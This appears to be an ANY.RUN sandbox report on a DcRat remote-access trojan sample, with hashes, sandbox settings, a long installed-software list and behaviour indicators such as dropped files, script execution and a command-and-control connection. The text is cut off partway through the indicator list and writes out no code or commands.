Malware analysis DcRat.exe Malicious activity | ANY.RUN

Add for printing

File name:	DcRat.exe
Full analysis:	https://app.any.run/tasks/5b22d44a-09e5-4e33-81ec-5b6a1d5fb50b
Verdict:	Malicious activity
Threats:	A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	February 17, 2024, 11:01:33
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	rat backdoor dcrat remote stealer
Indicators:
MIME:	application/x-dosexec
File info:	PE32 executable (GUI) Intel 80386, for MS Windows
MD5:	69E82C4A63266D58C4AC4E600BB5B0FD
SHA1:	C30BE7BDC9E9FD41484B957E0DC68446130BD7B4
SHA256:	147C37CC627DC68B9CDE63FE6509C5C1D3E923DEA1DDE6EFBCBD3AE2C84E0814
SSDEEP:	98304:HFrKdV6f5iv+3d5o1a7TSJALPOS8Nazxw4lADAu440GdKLL5PQU4xZekFeYqEfZe:HBx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: 60 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.19596 KB4534251
Adobe Acrobat Reader DC (20.013.20064)
Adobe Acrobat Reader DC (20.013.20064)
Adobe Flash Player 32 ActiveX (32.0.0.453)
Adobe Flash Player 32 ActiveX (32.0.0.453)
Adobe Flash Player 32 NPAPI (32.0.0.453)
Adobe Flash Player 32 NPAPI (32.0.0.453)
Adobe Flash Player 32 PPAPI (32.0.0.453)
Adobe Flash Player 32 PPAPI (32.0.0.453)
Adobe Refresh Manager (1.8.0)
Adobe Refresh Manager (1.8.0)
CCleaner (6.14)
CCleaner (6.14)
FileZilla 3.65.0 (3.65.0)
FileZilla 3.65.0 (3.65.0)
Google Chrome (109.0.5414.120)
Google Chrome (109.0.5414.120)
Google Update Helper (1.3.36.31)
Google Update Helper (1.3.36.31)
Java 8 Update 271 (8.0.2710.9)
Java 8 Update 271 (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Java Auto Updater (2.8.271.9)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft Edge (109.0.1518.115)
Microsoft Edge (109.0.1518.115)
Microsoft Edge Update (1.3.175.29)
Microsoft Edge Update (1.3.175.29)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x86 en-US) (115.0.2)
Mozilla Firefox (x86 en-US) (115.0.2)
Mozilla Maintenance Service (115.0.2)
Mozilla Maintenance Service (115.0.2)
Notepad++ (32-bit x86) (7.9.1)
Notepad++ (32-bit x86) (7.9.1)
PowerShell 7-x86 (7.2.11.0)
PowerShell 7-x86 (7.2.11.0)
Skype version 8.110 (8.110)
Skype version 8.110 (8.110)
Update for Microsoft .NET Framework 4.8 (KB4503575) (1)
Update for Microsoft .NET Framework 4.8 (KB4503575) (1)
VLC media player (3.0.11)
VLC media player (3.0.11)
WinRAR 5.91 (32-bit) (5.91.0)
WinRAR 5.91 (32-bit) (5.91.0)

Add for printing

MALICIOUS
- Drops the executable file immediately after the start
  - DcRat.exe (PID: 3240)
  - Comsession.exe (PID: 4044)
- Uses sleep, probably for evasion detection (SCRIPT)
  - wscript.exe (PID: 4052)
- DCRAT has been detected (SURICATA)
  - SearchFilterHost.exe (PID: 2104)
- Actions looks like stealing of personal data
  - SearchFilterHost.exe (PID: 2104)
- Connects to the CnC server
  - SearchFilterHost.exe (PID: 2104)
SUSPICIOUS
- Reads security settings of Internet Explorer
  - DcRat.exe (PID: 3240)
  - Comsession.exe (PID: 2840)
  - Comsession.exe (PID: 4044)
- Reads the Internet Settings
  - DcRat.exe (PID: 3240)
  - wscript.exe (PID: 4052)
  - Comsession.exe (PID: 2840)
  - Comsession.exe (PID: 4044)
  - SearchFilterHost.exe (PID: 2104)
- Executable content was dropped or overwritten
  - DcRat.exe (PID: 3240)
  - Comsession.exe (PID: 4044)
- The process executes VB scripts
  - DcRat.exe (PID: 3240)
- Executing commands from a ".bat" file
  - wscript.exe (PID: 4052)
  - Comsession.exe (PID: 4044)
- Starts CMD.EXE for commands execution
  - wscript.exe (PID: 4052)
  - Comsession.exe (PID: 2840)
  - Comsession.exe (PID: 4044)
- Runs shell command (SCRIPT)
